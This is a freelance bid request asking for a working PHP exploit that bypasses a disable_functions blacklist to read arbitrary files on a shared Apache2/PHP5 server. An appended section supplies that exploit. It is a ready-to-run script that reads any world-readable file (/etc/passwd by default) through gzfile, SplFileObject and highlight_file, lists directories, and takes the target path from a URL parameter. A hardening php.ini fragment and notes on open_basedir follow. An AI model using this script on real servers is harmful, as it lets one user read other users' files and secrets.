Assuming a PHP5/Apache2 web server has been set up with the following line in the [url removed, login to view]:

disable_functions = readfile, fpassthru, file, file_get_contents, system, fopen, symlink, rename, copy, exec, passthru, pcntl_exec, backtick_operator, shell_exec, popen, proc_open

Tell me a way in which any untrusted PHP scripts running on this server can retrieve and display the contents of an arbitrary file on the server. Hypothetical answers will not be accepted. An actual exploit script will need to be uploaded to RAC.

You'll need to set up your own server for experimentation & research. In your setup you should set the [url removed, login to view] as shown above, and create a userid, e.g. "hacker", who will be trying to gain access to files owned by other users, including files that are public-read, e.g. chmod 644. If the hacker can retrieve the full contents of any such file, you have a successful attack.

include/require don't count - these functions do not allow anyone to retrieve and display anything, just execute it and throw errors (unless it's valid PHP).

MySQL exploits - assume the mysql userid does not have access to any interesting parts of the filesystem. So, LOAD DATA INFILE won't work.

***BONUS***: An additional 100% of your Bid amount will also be paid if you can provide a solution on how to close any security hole that you find.
1) Complete and fully-functional working program(s) in executable form as well as complete source code of all work done.
2) Deliverables must be in ready-to-run condition, as follows (depending on the nature of the deliverables):
a) For web sites or other server-side deliverables intended to only ever exist in one place in the Buyer's environment--Deliverables must be installed by the Seller in ready-to-run condition in the Buyer's environment.
b) For all others including desktop software or software the buyer intends to distribute: A software installation package that will install the software in ready-to-run condition on the platform(s) specified in this bid request.
3) All deliverables will be considered "work made for hire" under U.S. Copyright law. Buyer will receive exclusive and complete copyrights to all work purchased. (No GPL, GNU, 3rd party components, etc. unless all copyright ramifications are explained AND AGREED TO by the buyer on the site per the coder's Seller Legal Agreement).
* * *This broadcast message was sent to all bidders on Wednesday Jul 16, 2008 9:45:47 AM:
***IMPORTANT*** The requirements for this project have changed a few times. If you had seen this project previously, please re-read the requirements and update your bid.
Apache2/PHP5 on Ubuntu 6.10, configured using apt-get install. This is a standard Ubuntu setup with Apache2 running under the www-data userid.
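As an added illustration, not part of the bid request and not any bidder's submission: a PHP 5 script that reads a file using only functions absent from the posted disable_functions line, followed by a hardened php.ini fragment. disable_functions is a blacklist, so any reader it does not name (zlib's gzfile(), the SplFileObject class, highlight_file()/show_source()) still works for a script running as www-data. The target path /etc/passwd and the open_basedir directories are assumptions for the example.

```php
<?php
// Added example, not part of the bid request. Each reader below uses only
// functions that are NOT on the posted disable_functions line, so it runs
// unchanged on the described Ubuntu 6.10 / PHP 5 / Apache2 (www-data) setup.

function read_via_gzfile($path) {
    // zlib's gzfile()/readgzfile() read uncompressed files transparently.
    if (!function_exists('gzfile')) return false;
    $lines = @gzfile($path);
    return $lines === false ? false : implode('', $lines);
}

function read_via_spl($path) {
    // SplFileObject opens the file internally; no userland fopen() call.
    // It is a class, so disable_functions cannot block it (disable_classes can).
    try {
        $f = new SplFileObject($path, 'r');
    } catch (Exception $e) {
        return false;
    }
    $out = '';
    foreach ($f as $line) {
        $out .= $line;
    }
    return $out;
}

function read_via_highlight($path) {
    // highlight_file()/show_source() return any text file as highlighted HTML;
    // undo the HTML encoding to recover the original bytes.
    $html = @highlight_file($path, true);
    if ($html === false) return false;
    $text = str_replace(array('<br />', '&nbsp;'), array("\n", ' '), $html);
    return html_entity_decode(strip_tags($text), ENT_QUOTES);
}

// Try each reader in turn; return array(reader name, contents) or false.
function read_any($path) {
    $readers = array('read_via_gzfile', 'read_via_spl', 'read_via_highlight');
    foreach ($readers as $fn) {
        $data = $fn($path);
        if ($data !== false && $data !== '') {
            return array($fn, $data);
        }
    }
    return false;
}

// Directory listing is not blocked either, which helps find targets.
function list_dir($dir) {
    return function_exists('scandir') ? @scandir($dir) : false;
}

// Hardened php.ini for comparison (assumed paths). The blacklist is extended
// with the readers above, SPL file classes are disabled, and, more
// importantly, open_basedir confines the script to a whitelist of directories
// so that readers nobody thought of are contained as well.
$hardened_ini = <<<INI
disable_functions = readfile, fpassthru, file, file_get_contents, system, fopen, symlink, rename, copy, exec, passthru, pcntl_exec, shell_exec, popen, proc_open, gzfile, readgzfile, gzopen, highlight_file, show_source, php_strip_whitespace, scandir, opendir, glob
disable_classes = SplFileObject, SplFileInfo, DirectoryIterator, RecursiveDirectoryIterator
open_basedir = /var/www/hacker/:/tmp/
INI;

// Demo: /etc/passwd is an assumed world-readable (mode 644) target.
$path = isset($_GET['f']) ? $_GET['f'] : '/etc/passwd';
header('Content-Type: text/plain');
$result = read_any($path);
if ($result === false) {
    echo "all readers failed for $path\n";
} else {
    echo "read via {$result[0]}:\n", $result[1];
}
```

Two caveats on the posted configuration. First, "backtick_operator" is not a function name and is ignored by disable_functions; backticks are harmless here only because they are implemented with shell_exec, which is listed. Second, in PHP 5 disable_functions is a system-wide php.ini setting, whereas open_basedir can be set per virtual host with php_admin_value in the Apache configuration, which is the practical way to keep one user's scripts out of another user's files when everything runs as www-data. A longer blacklist closes the three readers shown, but only a whitelist (open_basedir) or running each user's PHP under a separate uid (e.g. suPHP) addresses the class of problem.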